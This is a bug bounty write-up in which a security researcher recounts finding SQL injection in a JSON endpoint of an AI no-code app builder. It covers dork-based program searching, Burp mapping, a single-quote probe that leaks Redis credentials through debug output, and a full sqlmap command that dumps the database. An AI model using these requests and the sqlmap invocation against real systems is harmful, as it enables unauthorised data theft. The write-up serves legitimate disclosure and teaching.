SQL Injection Attack : On An AI Website | $$$ Bounty in just an hour.
بِسْمِ اللهِ الرَّحْمٰنِ الرَّحِيْمِ
Hello, I’m Nauman Khan a Security Researcher and BugHunt3r from Aurangabad, Maharashtra, India. You can connect with me on LinkedIn using my ID naumankh4n .
Join me on an exciting journey as I delve into the intriguing world of SQL injection vulnerabilities and share how I uncovered a hidden treasure and find the bug that rewarded me with $500.
This Write-Up will teach you how to search programmes , Map the WebApp and how to enumerate . so,
Searching For Programme
The Journey starts from a wonderful day I was searching for some Bug Bounty Programmes using Google Hacking technique (Google Dorking) example : intitle:”Bug Bounty” intext:”Reward” intext:”$” this will give results that having “Bug Bounty” string in title and “Reward” & ”$” in any where in the text field.
Saw a New one , just launched few days ago , After carefully reading the scope , I decided to Hack on it .
I can’t tell the programme name because they make sign an undertaking in which I can’t talk about the programme in public so lets call the domain whitedacted.com .
The company is AI based no-code Website/MobileApp Maker in which there are lots of functionalities to test.
Mapping The WebApplication
I just started the BurpSuite , configured the scope And started to Mapping the WebApplication while intercepting in background.
I tried to use as much as functionalities as possible in less time just like how an normal user would have use the website, after about 15–20 min of mapping the webapp I went to Burp’s history and started sending intresting requests to repeater.
The application gives user an userID and Website/MobileApp they try to create an appID.
After finding Many bugs in different endpoints I came to this intresting endpoint Which Sends a POST request to /app/store-app-to-db-web with some json data in body . You can Guess what was this endpoint does by just reading the Path.
The Request Looks like this.
POST /app/store-app-to-db-web HTTP/2
Host: subdomain.whitedacted.com
Cookies: AuthCookies=BlahBlahBlah...; sessionID=ABCD1234xyz;
Content-Type: application/json
Content-Length: 67
{
"saveLogin":"login",
"source":"publish_builder",
"appId":"1111111"
}After Replaying the request the application responses with my active sessionID in plain text.
Enumeration
Then I Started Changing data in Path , Cookies , And Json Body as well . I injected special chars in every field , tried to create every possible error in the application.
Also removing Auth Cookies and Session Cookies one by one to check the application’s behaviour .
The Bug
The vulnerability lies in the json input field , the backend application expects the proper “appID” otherwise it responses with “Invalid Session”.
I removed the appId ‘s value and put a SingleQuote[‘] and send the request. like this
{
"saveLogin":"login",
"source":"publish_builder",
"appId":"'"
}The Backend Application Crashes and gives 500 Status Code with Syntax Error in response.
And luckily the Debug mode was enabled so it leaked many critical information about the backend Database which includes the AWS Redis hostname , username and password .
I copied the request , put the injection point in the vulnerable input field and saved it in a text file then fed it to sqlmap.
The Request is saved. (Put a Asterisk[*] in the input field so sqlmap will use that as an injection point)
POST /app/store-app-to-db-web HTTP/2
Host: subdomain.whitedacted.com
Content-Type: application/json
Content-Length: 62
{
"saveLogin":"login",
"source":"publish_builder",
"appId":"*"
}The command I used.
sqlmap -r req.txt --batch --random-agent --proxy http://127.0.0.1:8080/ --force-ssl --cookie=""- -r : For request file .
- — batch : For non-interactive or use Default settings.
- — random-agent : For changing User-Agent header in each request .
- — proxy : For sending each request through BurpSuite proxy .
- — force-ssl : For forcing sqlmap to use a ssl connection in every request .
- — cookie=”” : For forcing sqlmap to don’t use any kind of cookies i’ll tell you why.
While enumerating I found this wierd behaviour , if we send cookie with the sql payload it gives the “Invalid Session” as I mentioned above , so we need to send every request without Cookie header.
And its a default behaviour of sqlmap to set cookies that comes in the response.
The Sqlmap is able to dump every thing from the database.
So, This was the bug i just Found in a matter of an hour .
Hope You liked The WriteUp And If you have Any queries ask me on linkedin.
